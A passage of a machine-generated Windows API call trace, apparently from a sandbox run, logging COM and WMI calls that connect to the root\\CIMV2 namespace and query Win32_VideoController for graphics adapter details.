out: pToken=0x19f030) returned 0x0 [0279.313] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542510, riid=0x19f100*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f0fc | out: ppvObject=0x19f0fc*=0x5542510) returned 0x0 [0279.313] WbemDefPath:IUnknown:AddRef (This=0x5542510) returned 0x3 [0279.313] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x2 [0279.314] WbemDefPath:IWbemPath:SetText (This=0x5542510, uMode=0x4, pszPath="root\\CIMV2") returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f27c | out: puCount=0x19f27c*=0x2) returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f278*=0x0, pszText=0x0 | out: puBuffLength=0x19f278*=0xf, pszText=0x0) returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f278*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f278*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f268 | out: puCount=0x19f268*=0x2) returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f264*=0x0, pszText=0x0 | out: puBuffLength=0x19f264*=0xf, pszText=0x0) returned 0x0 [0279.314] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f264*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f264*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.314] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1fc | out: ppv=0x19f1fc*=0x601a94) returned 0x0 [0279.314] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1f4 | out: pAptType=0x19f1f4*=1) returned 0x0 [0279.314] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1f8 | out: ppvObject=0x19f1f8*=0x0) returned 0x80004002 [0279.314] IUnknown:Release (This=0x601a94) returned 0x1 [0279.315] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee18 | out: ppv=0x19ee18*=0x55435c8) returned 0x0 [0279.315] WbemLocator:IUnknown:QueryInterface (in: This=0x55435c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f030 | out: ppvObject=0x19f030*=0x0) returned 0x80004002 [0279.315] WbemLocator:IClassFactory:CreateInstance (in: This=0x55435c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f044 | out: ppvObject=0x19f044*=0x54ba3c8) returned 0x0 [0279.316] WbemLocator:IUnknown:Release (This=0x55435c8) returned 0x0 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x54ba3c8) returned 0x0 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec20 | out: ppvObject=0x19ec20*=0x0) returned 0x80004002 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0279.316] WbemLocator:IUnknown:AddRef (This=0x54ba3c8) returned 0x3 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x0) returned 0x80004002 [0279.316] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0279.316] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x0) returned 0x80004002 [0279.316] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x2 [0279.316] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x1 [0279.316] CoGetContextToken (in: pToken=0x19f010 | out: pToken=0x19f010) returned 0x0 [0279.316] CoGetContextToken (in: pToken=0x19ef70 | out: pToken=0x19ef70) returned 0x0 [0279.316] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba3c8, riid=0x19f040*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f03c | out: ppvObject=0x19f03c*=0x54ba3c8) returned 0x0 [0279.316] WbemLocator:IUnknown:AddRef (This=0x54ba3c8) returned 0x3 [0279.317] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x2 [0279.317] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f1d8 | out: puCount=0x19f1d8*=0x2) returned 0x0 [0279.317] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=8, puBuffLength=0x19f1d4*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d4*=0xf, pszText=0x0) returned 0x0 [0279.317] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=8, puBuffLength=0x19f1d4*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d4*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.317] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0b0 | out: ppv=0x19f0b0*=0x54ba4c8) returned 0x0 [0279.317] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba4c8, strNetworkResource="\\\\.\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f144 | out: ppNamespace=0x19f144*=0x54b54f0) returned 0x0 [0279.344] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54f0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efe0 | out: ppvObject=0x19efe0*=0x66fb4c) returned 0x0 [0279.344] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66fb4c, pProxy=0x54b54f0, pAuthnSvc=0x19f030, pAuthzSvc=0x19f02c, pServerPrincName=0x19f024, pAuthnLevel=0x19f028, pImpLevel=0x19f018, pAuthInfo=0x19f01c, pCapabilites=0x19f020 | out: pAuthnSvc=0x19f030*=0xa, pAuthzSvc=0x19f02c*=0x0, pServerPrincName=0x19f024, pAuthnLevel=0x19f028*=0x6, pImpLevel=0x19f018*=0x2, pAuthInfo=0x19f01c, pCapabilites=0x19f020*=0x1) returned 0x0 [0279.345] WbemLocator:IUnknown:Release (This=0x66fb4c) returned 0x1 [0279.345] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54f0, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efd4 | out: ppvObject=0x19efd4*=0x66fb70) returned 0x0 [0279.345] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54f0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efd0 | out: ppvObject=0x19efd0*=0x66fb4c) returned 0x0 [0279.345] WbemLocator:IClientSecurity:SetBlanket (This=0x66fb4c, pProxy=0x54b54f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.345] WbemLocator:IUnknown:Release (This=0x66fb4c) returned 0x2 [0279.346] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0279.346] CoTaskMemFree (pv=0x54bc3b8) [0279.346] WbemLocator:IUnknown:Release (This=0x54ba4c8) returned 0x0 [0279.346] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54f0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebd0 | out: ppvObject=0x19ebd0*=0x66fb70) returned 0x0 [0279.346] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eb8c | out: ppvObject=0x19eb8c*=0x0) returned 0x80004002 [0279.346] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9ac | out: ppvObject=0x19e9ac*=0x0) returned 0x80004002 [0279.347] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54f0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e784 | out: ppvObject=0x19e784*=0x0) returned 0x80004002 [0279.347] WbemLocator:IUnknown:AddRef (This=0x66fb70) returned 0x3 [0279.347] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e4ec | out: ppvObject=0x19e4ec*=0x0) returned 0x80004002 [0279.347] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e49c | out: ppvObject=0x19e49c*=0x0) returned 0x80004002 [0279.347] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4a8 | out: ppvObject=0x19e4a8*=0x66facc) returned 0x0 [0279.347] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66facc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4b0 | out: pCid=0x19e4b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.347] WbemLocator:IUnknown:Release (This=0x66facc) returned 0x3 [0279.347] CoGetContextToken (in: pToken=0x19e508 | out: pToken=0x19e508) returned 0x0 [0279.347] CoGetContextToken (in: pToken=0x19e910 | out: pToken=0x19e910) returned 0x0 [0279.347] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9a0 | out: ppvObject=0x19e9a0*=0x66fb54) returned 0x0 [0279.348] WbemLocator:IRpcOptions:Query (in: This=0x66fb54, pPrx=0x66fb70, dwProperty=2, pdwValue=0x19e9c8 | out: pdwValue=0x19e9c8) returned 0x80004002 [0279.348] WbemLocator:IUnknown:Release (This=0x66fb54) returned 0x3 [0279.348] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x2 [0279.348] CoGetContextToken (in: pToken=0x19eee0 | out: pToken=0x19eee0) returned 0x0 [0279.348] CoGetContextToken (in: pToken=0x19ee40 | out: pToken=0x19ee40) returned 0x0 [0279.348] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x19ef10*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef0c | out: ppvObject=0x19ef0c*=0x54b54f0) returned 0x0 [0279.348] WbemLocator:IUnknown:AddRef (This=0x54b54f0) returned 0x4 [0279.348] WbemLocator:IUnknown:Release (This=0x54b54f0) returned 0x3 [0279.348] WbemLocator:IUnknown:Release (This=0x54b54f0) returned 0x2 [0279.348] SysStringLen (param_1=0x0) returned 0x0 [0279.348] CoGetContextToken (in: pToken=0x19eed8 | out: pToken=0x19eed8) returned 0x0 [0279.348] WbemLocator:IUnknown:AddRef (This=0x66fb70) returned 0x3 [0279.348] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed6c | out: ppvObject=0x19ed6c*=0x66fb70) returned 0x0 [0279.348] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x3 [0279.348] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x2 [0279.348] CoGetContextToken (in: pToken=0x19efc8 | out: pToken=0x19efc8) returned 0x0 [0279.348] WbemLocator:IUnknown:AddRef (This=0x54b54f0) returned 0x3 [0279.348] IWbemServices:ExecQuery (in: This=0x54b54f0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x19f1e0 | out: ppEnum=0x19f1e0*=0x663780) returned 0x0 [0279.423] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f038 | out: ppvObject=0x19f038*=0x663784) returned 0x0 [0279.423] IClientSecurity:QueryBlanket (in: This=0x663784, pProxy=0x663780, pAuthnSvc=0x19f088, pAuthzSvc=0x19f084, pServerPrincName=0x19f07c, pAuthnLevel=0x19f080, pImpLevel=0x19f070, pAuthInfo=0x19f074, pCapabilites=0x19f078 | out: pAuthnSvc=0x19f088*=0xa, pAuthzSvc=0x19f084*=0x0, pServerPrincName=0x19f07c, pAuthnLevel=0x19f080*=0x6, pImpLevel=0x19f070*=0x2, pAuthInfo=0x19f074, pCapabilites=0x19f078*=0x1) returned 0x0 [0279.423] IUnknown:Release (This=0x663784) returned 0x1 [0279.423] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f02c | out: ppvObject=0x19f02c*=0x66f870) returned 0x0 [0279.423] IUnknown:QueryInterface (in: This=0x663780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f028 | out: ppvObject=0x19f028*=0x663784) returned 0x0 [0279.423] IClientSecurity:SetBlanket (This=0x663784, pProxy=0x663780, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.425] IUnknown:Release (This=0x663784) returned 0x2 [0279.425] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0279.425] CoTaskMemFree (pv=0x54bc2f8) [0279.425] IUnknown:QueryInterface (in: This=0x663780, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec24 | out: ppvObject=0x19ec24*=0x66f870) returned 0x0 [0279.425] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebe0 | out: ppvObject=0x19ebe0*=0x0) returned 0x80004002 [0279.426] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9fc | out: ppvObject=0x19e9fc*=0x0) returned 0x80004002 [0279.426] IUnknown:QueryInterface (in: This=0x663780, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7d4 | out: ppvObject=0x19e7d4*=0x0) returned 0x80004002 [0279.427] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0279.427] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e53c | out: ppvObject=0x19e53c*=0x0) returned 0x80004002 [0279.427] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4ec | out: ppvObject=0x19e4ec*=0x0) returned 0x80004002 [0279.427] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4f8 | out: ppvObject=0x19e4f8*=0x66f7cc) returned 0x0 [0279.427] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f7cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e500 | out: pCid=0x19e500*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.427] WbemLocator:IUnknown:Release (This=0x66f7cc) returned 0x3 [0279.427] CoGetContextToken (in: pToken=0x19e558 | out: pToken=0x19e558) returned 0x0 [0279.427] CoGetContextToken (in: pToken=0x19e960 | out: pToken=0x19e960) returned 0x0 [0279.427] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9f0 | out: ppvObject=0x19e9f0*=0x66f854) returned 0x0 [0279.427] WbemLocator:IRpcOptions:Query (in: This=0x66f854, pPrx=0x66f870, dwProperty=2, pdwValue=0x19ea18 | out: pdwValue=0x19ea18) returned 0x80004002 [0279.427] WbemLocator:IUnknown:Release (This=0x66f854) returned 0x3 [0279.427] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0279.427] CoGetContextToken (in: pToken=0x19ef38 | out: pToken=0x19ef38) returned 0x0 [0279.427] CoGetContextToken (in: pToken=0x19ee98 | out: pToken=0x19ee98) returned 0x0 [0279.427] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x19ef68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ef64 | out: ppvObject=0x19ef64*=0x663780) returned 0x0 [0279.427] IUnknown:AddRef (This=0x663780) returned 0x4 [0279.427] IUnknown:Release (This=0x663780) returned 0x3 [0279.427] IUnknown:Release (This=0x663780) returned 0x2 [0279.427] WbemLocator:IUnknown:Release (This=0x54b54f0) returned 0x2 [0279.428] SysStringLen (param_1=0x0) returned 0x0 [0279.428] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f22c | out: puCount=0x19f22c*=0x2) returned 0x0 [0279.428] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f228*=0x0, pszText=0x0 | out: puBuffLength=0x19f228*=0xf, pszText=0x0) returned 0x0 [0279.428] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f228*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f228*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.428] CoGetContextToken (in: pToken=0x19f078 | out: pToken=0x19f078) returned 0x0 [0279.428] IUnknown:AddRef (This=0x663780) returned 0x3 [0279.428] IEnumWbemClassObject:Clone (in: This=0x663780, ppEnum=0x19f238 | out: ppEnum=0x19f238*=0x663398) returned 0x0 [0279.429] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0fc | out: ppvObject=0x19f0fc*=0x66339c) returned 0x0 [0279.429] IClientSecurity:QueryBlanket (in: This=0x66339c, pProxy=0x663398, pAuthnSvc=0x19f14c, pAuthzSvc=0x19f148, pServerPrincName=0x19f140, pAuthnLevel=0x19f144, pImpLevel=0x19f134, pAuthInfo=0x19f138, pCapabilites=0x19f13c | out: pAuthnSvc=0x19f14c*=0xa, pAuthzSvc=0x19f148*=0x0, pServerPrincName=0x19f140, pAuthnLevel=0x19f144*=0x6, pImpLevel=0x19f134*=0x2, pAuthInfo=0x19f138, pCapabilites=0x19f13c*=0x1) returned 0x0 [0279.429] IUnknown:Release (This=0x66339c) returned 0x1 [0279.429] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0f0 | out: ppvObject=0x19f0f0*=0x66fc70) returned 0x0 [0279.429] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0ec | out: ppvObject=0x19f0ec*=0x66339c) returned 0x0 [0279.429] IClientSecurity:SetBlanket (This=0x66339c, pProxy=0x663398, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0279.431] IUnknown:Release (This=0x66339c) returned 0x2 [0279.431] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0279.431] CoTaskMemFree (pv=0x54bc5f8) [0279.431] IUnknown:QueryInterface (in: This=0x663398, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecd8 | out: ppvObject=0x19ecd8*=0x66fc70) returned 0x0 [0279.431] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec94 | out: ppvObject=0x19ec94*=0x0) returned 0x80004002 [0279.431] WbemLocator:IUnknown:QueryInterface (in: 